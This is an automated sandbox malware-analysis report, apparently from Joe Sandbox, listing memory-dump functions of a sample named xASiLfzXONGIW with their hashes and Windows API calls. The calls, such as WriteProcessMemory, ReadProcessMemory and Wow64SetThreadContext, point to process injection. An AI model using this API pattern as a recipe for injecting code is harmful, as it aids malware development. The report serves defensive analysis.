                                • Opcode Fuzzy Hash: 6deeb81b0c9b6723a6dab5667c40f600bfc3e874c5761e806adbf84e65b37b2e
                                • Instruction Fuzzy Hash: E3914EB1D0062EDFEB10CF68C840BDEBBB2BF44314F5585AAD809A7240DB749996DF91

                                Control-flow Graph (figure omitted)
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 013EAFBE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: cab6da80f1f4295675fe55ff25810c8908b9cc266fdda7224d992cfaf6e3adf6
                                • Instruction ID: f69352de2ead45b0d4ee496fffa86027a19cdc45bffe8bf137421e306202eb01
                                • Opcode Fuzzy Hash: cab6da80f1f4295675fe55ff25810c8908b9cc266fdda7224d992cfaf6e3adf6
                                • Instruction Fuzzy Hash: FA713670A00B158FE725DF2AD05475ABBF1FF88308F108A2DD48AD7A90D775E949CB91

                                Control-flow Graph (figure omitted)
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 013E59C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 52bc38d69512165e235f1dd0aaca59fe393a182245e6624849ab5c0915111ab2
                                • Instruction ID: e3fb4797de34839896269124dd850c682a566c27aeef15354ecb6249425a5ec0
                                • Opcode Fuzzy Hash: 52bc38d69512165e235f1dd0aaca59fe393a182245e6624849ab5c0915111ab2
                                • Instruction Fuzzy Hash: 9641F674C00729CBEB25DFAAC844BDDBBF5BF49308F20815AD409AB291DB716946CF50

                                Control-flow Graph (figure omitted)
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1f91bc5830c3fdbaac207997d12e275e60a3357563f88d88195f77e3ad4120e0
                                • Instruction ID: bdc06de31baf7228ded60733364be8c4f007166b0e7ed7d3eef9f6d1811ff055
                                • Opcode Fuzzy Hash: 1f91bc5830c3fdbaac207997d12e275e60a3357563f88d88195f77e3ad4120e0
                                • Instruction Fuzzy Hash: 0A31AB79805769CFEF12DBA8C8497EDBBF0AF4632CF10814AD045AB292C775994ACB50

                                Control-flow Graph (figure omitted)
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 013E59C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 93456498e4defcdab741fc915ba24c91f2c563ab58582882b2b571dbba32d312
                                • Instruction ID: 2e6716c4a4fcb93e10ce4ce6764786f60be4a964a871a92bd6a935167a106859
                                • Opcode Fuzzy Hash: 93456498e4defcdab741fc915ba24c91f2c563ab58582882b2b571dbba32d312
                                • Instruction Fuzzy Hash: 7741AF74C00729CBEB25DFAAC845BDDBBF5BF49308F20806AD409AB251DBB56945CF90

                                Control-flow Graph (figure omitted)
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074210D8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: daad498c49f38a3802c3cffa63befb19702560feccb6f097433caea5886192c2
                                • Instruction ID: 8698194d3c46cfc72ad5968dbb83f1a48b28dae537c668df567c00643e8a1529
                                • Opcode Fuzzy Hash: daad498c49f38a3802c3cffa63befb19702560feccb6f097433caea5886192c2
                                • Instruction Fuzzy Hash: A12126B590035D9FDB10CFAAC881BEEBBF5FF48310F10842AE919A7240D7799955CBA0

                                Control-flow Graph (figure omitted)
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074210D8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: f34a9f96b259ee6d92d59005bf306a88b4dea6be17abfacd2dafe11e77a973ae
                                • Instruction ID: a90ecd2fa05b5c340408d74198af5d4735bd5eac9a2dd101c4902564606bd65b
                                • Opcode Fuzzy Hash: f34a9f96b259ee6d92d59005bf306a88b4dea6be17abfacd2dafe11e77a973ae
                                • Instruction Fuzzy Hash: D82115B590035D9FDB10CFAAC880BDEBBF5FF48310F50842AE919A7240C7799955CBA0

                                Control-flow Graph (figure omitted)
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07420F2E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 5c22a848bb62ba3e578ab2e89d439a8188da1cb7c027281cac6992b4d386525a
                                • Instruction ID: 7c47139637a4edad1e886ed8d8b3b1f2ee323d6df21b44f52abbc05044d272c6
                                • Opcode Fuzzy Hash: 5c22a848bb62ba3e578ab2e89d439a8188da1cb7c027281cac6992b4d386525a
                                • Instruction Fuzzy Hash: 24216AB1D003198FDB10CFAAC4817EEBBF4EF48314F54842AD819A7240DB78A946CFA0

                                Control-flow Graph (figure omitted)
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07420F2E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 6ba35c6cdbfc0bf2188399ff7ba3ded1fd287fcfa3f451b4157462aff4926e25
                                • Instruction ID: 6b49c8b84fbd14bcd51d64d5ce3fede5b8a2da3889a8cb432dc9ce9c044998e2
                                • Opcode Fuzzy Hash: 6ba35c6cdbfc0bf2188399ff7ba3ded1fd287fcfa3f451b4157462aff4926e25
                                • Instruction Fuzzy Hash: AA2138B1D003198FDB10DFAAC4847EEBBF5EF48324F54842AD519A7240CB78A945CFA0

                                Control-flow Graph (figure omitted)
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074211B8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 05ff44aef9e206caadbe0b22ba21395b1dd62e1f6d404528e435728a5f0085e6
                                • Instruction ID: 94dd17b72d1691ce2a16966adbbf7350713db57f46a23f7312ef4f8a835a3c3d
                                • Opcode Fuzzy Hash: 05ff44aef9e206caadbe0b22ba21395b1dd62e1f6d404528e435728a5f0085e6
                                • Instruction Fuzzy Hash: EF2114B1D003599FDB10DFAAC880BEEBBF5FF48310F54842AE919A7250C7789955CBA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED6D7
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 78064ddae1936fec619e6712ef61cb7e115bcd5fdd3e7614ac66207887982d11
                                • Instruction ID: 212f2a702ada231210783e878e6d432eb5f25132d712931d5931b34799910739
                                • Opcode Fuzzy Hash: 78064ddae1936fec619e6712ef61cb7e115bcd5fdd3e7614ac66207887982d11
                                • Instruction Fuzzy Hash: F621E0B59003189FDB10CFAAD884ADEBBF8EB48320F14801AE918A7250C374A944CFA4
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED6D7
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 4828a62d29139e72e08b3bfa5bf2197789316094127540f1b9ff0280019d8143
                                • Instruction ID: be5c50e83195fd701e6e90ccfe409f40228dda255516c93213bd0950835654dd
                                • Opcode Fuzzy Hash: 4828a62d29139e72e08b3bfa5bf2197789316094127540f1b9ff0280019d8143
                                • Instruction Fuzzy Hash: 3E21E4B5D003599FDB10CFAAD584BDEBBF5EB48314F14841AE918A7350C374AA54CF64
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074211B8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 865d5fdfce1ecebaa36efade40dbe3bd80d85cc01ab24e0c6e09280fc80f79ed
                                • Instruction ID: 31f671f93dcd00ba38c93804d47a3a6cfb420e87d6b2cb01bdb6c513c12c7087
                                • Opcode Fuzzy Hash: 865d5fdfce1ecebaa36efade40dbe3bd80d85cc01ab24e0c6e09280fc80f79ed
                                • Instruction Fuzzy Hash: FF2148B5D003598FDB10CFAAC980BEEBBF1FF48310F14842AE918A7240C7789555CBA0
                                Strings
                                Memory Dump Source
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ec4074a63abb9699509032351165fa047f9e3a64b6daf1dfbaaedf4c8599485f
                                • Instruction ID: 25d8176d77a750cae7a54aab585751b78428509fb9a35a969421c0ad2f40dc6e
                                • Opcode Fuzzy Hash: ec4074a63abb9699509032351165fa047f9e3a64b6daf1dfbaaedf4c8599485f
                                • Instruction Fuzzy Hash: 081124B1B0025A8FDB54EBB994106EEB7F6BF88310B504179C915E7340EF35AE15CB91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1379700333.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_127d000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                • Instruction ID: 42ac343c1f05833b9d211cb1962dab9c7e8a26143352afce94b762acf57ca4ce
                                • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                • Instruction Fuzzy Hash: 4B11DF76404284CFCB12CF54D5C0B16BF71FB84324F24C6A9D9490B656C33AD45ACBA1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1379700333.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_127d000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                • Instruction ID: c4f0c3ab5289e4b02d44b667825f8c9cf654470c0e317fad20b121b3b1f724cc
                                • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                • Instruction Fuzzy Hash: 9F11DF76404285DFDB12CF44D5C0B56BF71FB84324F24C2A9D9090B657C33AE456CBA1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19af67f37ed5a0f97341647b2924f37a150a9642d5e813ee67d26fb66cadb556
                                • Instruction ID: 16c0822e471df9d18246839da5351aebf916133b9d46e0e3267698b0f47d44d7
                                • Opcode Fuzzy Hash: 19af67f37ed5a0f97341647b2924f37a150a9642d5e813ee67d26fb66cadb556
                                • Instruction Fuzzy Hash: 3121D3B5D043499FDB20CF9AD884BDEBBF5FB48310F108419E919A7210C375AA55CFA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1379801018.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_128d000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                • Instruction ID: f54e24440e0b316e91d2af440db4347cd77e15867ebb509c34df92701c599f94
                                • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                • Instruction Fuzzy Hash: F411BB75504284DFDB12DF54C5C0B15BBB1FB84324F28C6AAD9494B69BC33AD41ACB61
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1379801018.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_128d000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                • Instruction ID: e7829dcab54a4929c75a09bcb00b59aa201cca208af30a347c169b592cd5f9ac
                                • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                • Instruction Fuzzy Hash: 3711BB75508284CFDB12DF54D5C4B15BBA2FB84314F28C6AAD9494B696C33AD40BCBA2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 124d9aef9cd28542c860af04ec6fb0827284bb0f47828ca3dd6fc19c6ffbaa38
                                • Instruction ID: 99bf915dda754eaa4620eeaedc5b05d30a071ae39cb9e579046d297ed068df2d
                                • Opcode Fuzzy Hash: 124d9aef9cd28542c860af04ec6fb0827284bb0f47828ca3dd6fc19c6ffbaa38
                                • Instruction Fuzzy Hash: 8511ECB1D10659CBEB18CFA7C90579EFEF7AFC8300F14C07A981966664EB7409468F50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12490ad85fbbbffe642d0cbba8ec16a60ac0231a72c80c20af90953d472c68d5
                                • Instruction ID: 3aa31df761db6bef09724d096862c6d5a350d97586b571d308c06e0b05e657f8
                                • Opcode Fuzzy Hash: 12490ad85fbbbffe642d0cbba8ec16a60ac0231a72c80c20af90953d472c68d5
                                • Instruction Fuzzy Hash: 4A11BAB1D006199BEB18CF57C84579EFEF7AFC9300F14C07A981966664DB7409458F90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 844eea8b0178d594efe056ae7f070d2185146ddb9087ce0cd404270702c65e29
                                • Instruction ID: 524a9108efa0a1131e32fd382b4ee185fe1dc6321307d0c1be0c90a5f48e2e03
                                • Opcode Fuzzy Hash: 844eea8b0178d594efe056ae7f070d2185146ddb9087ce0cd404270702c65e29
                                • Instruction Fuzzy Hash: 3F1106B5D00659CBEB18CFABC80079DFFF7AFC8304F18D0AA980966224DB7409428F50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1379700333.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_127d000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1dd206221f9e2983565a953dba16490bcbc745545325614f2b2459b91b32dbee
                                • Instruction ID: 3251912eba08d4e85ba7265f633c2dbed8f9bf333eaee72a953d5634a2c33ddd
                                • Opcode Fuzzy Hash: 1dd206221f9e2983565a953dba16490bcbc745545325614f2b2459b91b32dbee
                                • Instruction Fuzzy Hash: 5801DB714143899FF7244B99DC84767FFD8EF45624F18C41AEE094E286C7799840CA71
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 49c5f444d2bb1f98af54b2c3173af35b2d29a8c7f3ef56759e729a3d7d075355
                                • Instruction ID: ea581dcf64d9a5cb3ead8d0c49d227a39ceccf072351d9a4d9e771cef8301209
                                • Opcode Fuzzy Hash: 49c5f444d2bb1f98af54b2c3173af35b2d29a8c7f3ef56759e729a3d7d075355
                                • Instruction Fuzzy Hash: D7111BF4918359CFEB54CF69C848EADBBF9BB4A305F00A5A6D80EA7651C7344985CF20
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 79d16c9237c4a4f964d503767d90c02e99333354f16f00a9aef750108b1b4a69
                                • Instruction ID: 78c293f1f1138ca15dc0c36fe5bdf794b90a30c65d949b80680456c98f06f7e5
                                • Opcode Fuzzy Hash: 79d16c9237c4a4f964d503767d90c02e99333354f16f00a9aef750108b1b4a69
                                • Instruction Fuzzy Hash: 9B014FB8A14208DFD704DFA9C585EADBBF9AB49300F15E095D80D97711D730DE01EB50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee68f3e1ed4f14d266405b6d1f73a57dc7da39cbc62b89ae76a5963e1ec593ab
                                • Instruction ID: 3fb8f45968a86e0831965a7da98bc6908bbf8ee40849173332d43e23cc58ab44
                                • Opcode Fuzzy Hash: ee68f3e1ed4f14d266405b6d1f73a57dc7da39cbc62b89ae76a5963e1ec593ab
                                • Instruction Fuzzy Hash: 0DF01DF495C30ADBE708CF55D440EB9BBBCAB4A304F04F1A5980E66611DA709A45EB60
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26c321d279a38b4b6de2dc931da97186bb44ecd97448ae192ece12c173b67cf5
                                • Instruction ID: 1dc34110eb6f803d3ae96ce341e892c3138ac46ad4d25031904b118239b7ffc0
                                • Opcode Fuzzy Hash: 26c321d279a38b4b6de2dc931da97186bb44ecd97448ae192ece12c173b67cf5
                                • Instruction Fuzzy Hash: 4301FBF4E14209DFDB44DFA9C940AAEBBF9FF49300F1085AA9819E3341EB319A01CB51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d886fa9ceddca3115afc2519a7ce05e167b1566b1a514c970c52906fc777a93d
                                • Instruction ID: abb9317f3311575e4921c01d18a71f5575139ab6138609c8b2665db7d460e816
                                • Opcode Fuzzy Hash: d886fa9ceddca3115afc2519a7ce05e167b1566b1a514c970c52906fc777a93d
                                • Instruction Fuzzy Hash: 0E0146B8E00209DFDB40DFA8C9507AEBBF5FB48300F1085AA8818E3340EB358A01CB91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: efd0768f2124ab10e682d02f53366b2b948c48beb73258b149776221ae0fdc5c
                                • Instruction ID: 50f1cac2d98f9eb13c510fb3596d9f20b026d9a562ae94eb68b0121509190a1c
                                • Opcode Fuzzy Hash: efd0768f2124ab10e682d02f53366b2b948c48beb73258b149776221ae0fdc5c
                                • Instruction Fuzzy Hash: 840119F8D1420ADFDB54DFB8D5466AEBBF4FB48300F5084AA9809E3740EB308A00DB51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0fbbfb719bc45b1caa8c9aea907dff5caa497a63946b3c9b90fdd421e3e39cd6
                                • Instruction ID: 6e6f1f743c9d6c269540a4e6d6037709d347ed7818303d751bdb4fac2c087e4e
                                • Opcode Fuzzy Hash: 0fbbfb719bc45b1caa8c9aea907dff5caa497a63946b3c9b90fdd421e3e39cd6
                                • Instruction Fuzzy Hash: C001FBB8E0020ADFDB54DFA9C5467AEBBF5FB48300F5085AAD809E3341EB308A05DB51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1379700333.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_127d000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b5296b02495a626cf9b1947da46c9c166462dc0671d8a7b26083d7e705b8af26
                                • Instruction ID: 02ec03389a102812f0f0c221beecf25ab0a7aef3862197fd1095d9fdfcbc6df5
                                • Opcode Fuzzy Hash: b5296b02495a626cf9b1947da46c9c166462dc0671d8a7b26083d7e705b8af26
                                • Instruction Fuzzy Hash: CAF062754053849FE7248A5ADD84B63FFA8EF41624F18C45AEE485F286C3799844CAB1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb45a5e4736f9e7260e006217fde1f71a083444f6c11388b552a73f852208a3d
                                • Instruction ID: 4a14d0e30c771e883f68ee7689833ea7aabedf0ccaafa3a3df771b9a64c7fb1c
                                • Opcode Fuzzy Hash: bb45a5e4736f9e7260e006217fde1f71a083444f6c11388b552a73f852208a3d
                                • Instruction Fuzzy Hash: A0012CB1804219DFEB20CF69C8457EEBBB1BF44720F548619E828AB2E0D3744A44CF91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eca30c3c321e6168fa0bf98239191942425dc2b36fb79dacfebbcc6d6eabb90d
                                • Instruction ID: 8bec799eeaf451eff845a531d08af43e1f64bbc5900dd2bde31d4a06b413e654
                                • Opcode Fuzzy Hash: eca30c3c321e6168fa0bf98239191942425dc2b36fb79dacfebbcc6d6eabb90d
                                • Instruction Fuzzy Hash: 2DF0BE727086142FD300C76AEC84E6BBBE9EBCD274B11826AF418C7391CA358C01C7A0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7dae2fbfc397179eccb28fba291cc6c606f22147f83ebf090f4c65211f8ab09e
                                • Instruction ID: d3419983c0c033638cf30babf1e3a9d092db6c78da8210ca7c8bea71ba6ea13d
                                • Opcode Fuzzy Hash: 7dae2fbfc397179eccb28fba291cc6c606f22147f83ebf090f4c65211f8ab09e
                                • Instruction Fuzzy Hash: 39F0FFB4E04209DFDB40DFA8C445A6EBBF4FB49304F1085A9DC18E3340DB769A05DB40
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e79a4d43665e26c2b4b5f51d518242af8ed104bf01caf4fabc3f9391517db986
                                • Instruction ID: c5ba3bae2a63fac2c9ec7d8a5cab8eee5ac7abcc8b9910b86379c33d21dcfb26
                                • Opcode Fuzzy Hash: e79a4d43665e26c2b4b5f51d518242af8ed104bf01caf4fabc3f9391517db986
                                • Instruction Fuzzy Hash: 4E01FBB0804219DFEB14CF6AC405BAEBBF5FF48760F508625E828AB290D7754A44CFD1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b16696b48ecce64dac7de1e60ef2bd04bac8145d9ef28f23b310a834f4dbbb6
                                • Instruction ID: 36e36aa1f3a6240e2caf5c9d3831038c580899850679c56ce41c309995ae84d3
                                • Opcode Fuzzy Hash: 3b16696b48ecce64dac7de1e60ef2bd04bac8145d9ef28f23b310a834f4dbbb6
                                • Instruction Fuzzy Hash: 33F0F9F8D0421ADFDB44DFA9D5416AEBBF8BB48300F1085AAD818E3300EB309A55DF91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
